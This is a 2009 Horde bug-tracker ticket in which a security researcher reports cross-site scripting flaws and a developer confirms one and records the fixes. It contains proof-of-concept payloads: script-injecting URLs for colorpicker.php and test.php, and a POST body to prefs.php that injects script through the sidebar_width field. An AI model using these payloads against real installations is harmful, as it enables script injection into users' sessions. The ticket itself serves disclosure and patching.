5.3.0-git
2014-11-28

[#8399] Number preferences are not validated properly
Summary Number preferences are not validated properly
Queue Horde Base
Queue Version HEAD
Type Bug
State Resolved
Priority 2. Medium
Owners chuck (at) horde (dot) org
Requester security (at) davidwharton (dot) us
Created 2009-07-03 (1974 days ago)
Due
Updated 2009-07-11 (1966 days ago)
Assigned 2009-07-11 (1966 days ago)
Resolved 2009-07-11 (1966 days ago)
Milestone 3.3.5
Patch No

History
2009-07-11 23:40:05 Chuck Hagenbuch Comment #4
Taken from Horde DevelopersHorde Developers
State ⇒ Resolved
Reply to this comment
Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).
2009-07-11 21:08:06 Chuck Hagenbuch Comment #2
Milestone ⇒ 3.3.5
Version ⇒ HEAD
State ⇒ Assigned
Summary ⇒ Number preferences are not validated properly
Assigned to Horde DevelopersHorde Developers
Assigned to Chuck Hagenbuch
Reply to this comment
Multiple cross site scripting vulnerabilites exist.  Proof of concepts:
Horde 3.1 has been deprecated for a long time. The current stable 
version is 3.3, and we backport serious security fixes to 3.2.
http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["
This file doesn't exist in 3.2 or later.
This was fixed almost 2 years ago, before 3.2.0:

http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9
POST to http://hordeserver.com/horde/services/prefs.php with the
following content:
actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on



This I can actually reproduce as a problem. Patch forthcoming.
2009-07-03 18:48:49 security (at) davidwharton (dot) us Comment #1
State ⇒ Unconfirmed
Patch ⇒ No
Milestone ⇒
Queue ⇒ Horde Base
Summary ⇒ Multiple Cross Site Scripting Vulnerabilities
Type ⇒ Bug
Priority ⇒ 2. Medium
Reply to this comment
Multiple cross site scripting vulnerabilites exist.  Proof of concepts:



http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>



https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["



https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>



POST to http://hordeserver.com/horde/services/prefs.php with the 
following content:



actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on